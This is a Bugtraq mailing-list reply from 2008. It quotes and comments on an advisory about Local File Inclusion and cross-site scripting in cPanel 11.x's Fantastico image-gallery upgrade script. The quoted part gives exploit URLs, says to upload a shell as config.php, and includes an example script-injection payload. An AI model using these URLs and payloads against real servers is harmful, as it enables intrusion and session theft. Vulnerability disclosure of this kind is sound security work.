Bugtraq: Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani

[Jan van Niekerk <jvnkrk () gmail com>]

On Friday 31 October 2008 15:03:55 irancrash () gmail com wrote:
> ----------------------------------------------------------------
>
> Script : Cpanel 11.x
>
> Type : Local File Inclusion & Cross Site Scripting
>
> Risk : High
>
> ----------------------------------------------------------------
>
> Discovered by : Khashayar Fereidani
>
> **** I am 17 Years Old ****
Happy birthday to you.
> My Official Website : HTTP://FEREIDANI.IR
>
> Team Website : Http://IRCRASH.COM
>
> Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
>
> Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
>
> ----------------------------------------------------------------
>
> Local File Inclusion Vulnerability :
>
> Note : Rename your shell to config.php and upload with your ftp account in
> ./ directory .... , now login in cpanel and enter vulnerable address in url
> ....
>
>
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
> de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra
> de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
>
> https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad
> e.php?action=GoAhead&scriptpath_show=/home/[youruser]/
According to netenberg.com there is no prospect of privilege escalation here.

On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say:
> > I do not see any reason as to why anyone would do this as they can already 
> > do the same via cPanel/SSH (this exploit will only work on the cPanel 
> > account of the person who wishes to use it; he/she cannot affect any other 
> > account on the server).   
I guess they feel similarly about the cross-site scripting.  You can start 
embedding those links in spam to your administrator now.

> ----------------------------------------------------------------
>
> Cross site scripting :
>
> File Address :
> frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%
> 20to%201.7.4
>
> Set Action as Upgrade%20to%201.7.4
>
> Vulnerable Variables :
>
> $localapp
> $updatedir
> $scriptpath_show
> $domain_show
> $thispage
> $thisapp
> $currentversion
>
> For Example :
> https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
> de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%
> 3C/script%3E